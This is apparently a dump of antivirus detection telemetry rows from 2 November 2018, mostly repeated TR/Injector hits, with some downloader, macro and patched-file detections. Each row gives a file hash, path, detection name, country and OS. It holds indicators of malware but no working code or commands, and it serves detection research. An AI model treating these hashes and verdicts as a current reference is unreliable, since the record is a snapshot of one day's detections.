  Row(detection=Row(filename='avscan-20181102-061327-62245539', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061327-62245539', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052836-1deede46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052836-1DEEDE46', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100936-e95446bc', filepath='C:\\WINDOWS\\TEMP\\AvGuardIA_33aa8071\\AVSCAN-20181102-100912-E375512C\\AVSCAN-20181102-100936-E95446BC', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:09:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055228-736e8d0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055228-736E8D0C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='islandsf.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\ISLANDSF\\ISLANDSF.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX06.456\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX06.456\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:09:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050727-29dd88a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050727-29DD88A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052656-e2515511', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052656-E2515511', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051008-899a4cba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051008-899A4CBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052440-9149a683', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052440-9149A683', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061826-141fffa6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061826-141FFFA6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053947-ae21df5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053947-AE21DF5E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052619-cc76d8c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052619-CC76D8C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061044-01109de9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061044-01109DE9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055042-346e7d3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055042-346E7D3F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060257-eaae968e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060257-EAAE968E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054600-8c4e0d03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054600-8C4E0D03', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062603-24cdac77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062603-24CDAC77', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055802-3ac558ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055802-3AC558AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055108-43e96dc7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055108-43E96DC7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061617-c7127a61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061617-C7127A61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055347-a28380bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055347-A28380BF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061057-085f7bdf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061057-085F7BDF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054941-10593ff6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054941-10593FF6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054018-c0816fa0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054018-C0816FA0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055342-9f6f4bfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055342-9F6F4BFB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060445-2b018831', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060445-2B018831', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051818-ad6c5b99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051818-AD6C5B99', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062540-16a2656c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062540-16A2656C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051629-6ca9941d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051629-6CA9941D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055042-3497a9fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055042-3497A9FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132006-e234315c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a7535d0\\AVSCAN-20181102-131947-DF63D6FB\\AVSCAN-20181102-132006-E234315C', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='84e9759bd3634b175e08dd3679a8e792eb686382c30b4056794e0db8d3c19397', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:20:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050604-f8487d94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050604-F8487D94', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='desinstalar.exe', filepath='G:\\PUBLICA\\Cida\\AIDF\\backup NF-e\\ARQUIVOS ANTIGOS\\Diversos\\Marcelo 23072009\\Andrea-Camila\\PASTA\\Declarações\\Dacon2006\\Desinstalar.exe', filesize=128000, name='TR/Crypt.XPACK.ilzsk.#M1.#R1'), hash='78d9a17c8ed438abba962d1bc61e851f232b0c4977775a583505710a73400c1d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:03:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051437-2a23dbe0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051437-2A23DBE0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062417-e564243d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062417-E564243D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050549-ef86df78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050549-EF86DF78', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051203-ce3c9ca5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051203-CE3C9CA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053803-701d2e9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053803-701D2E9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054136-ef29ebe3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054136-EF29EBE3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050617-ffddf620', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050617-FFDDF620', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053314-c3f45b59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053314-C3F45B59', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055755-3653a4a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055755-3653A4A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053744-649960f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053744-649960F4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055413-b222186c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055413-B222186C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T16:58:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053358-dde63af4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053358-DDE63AF4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051404-161caf59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051404-161CAF59', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053219-a2c644f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053219-A2C644F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060627-679abefa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060627-679ABEFA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062235-a8b7d2a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062235-A8B7D2A8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='TR/Patched.Gen.#M300.#R2947'), hash='7e59ec1097acb9cbb852cf8ed34c754f9d8f2d9d27c6dd1ae4d718bd0a18dd15', metadata=Row(cmdline='\\\\\\/minimized \\\\\\/service', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T07:03:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060106-a86c787f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060106-A86C787F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:05Z'), dt=datetime.date(2018, 11, 2)),
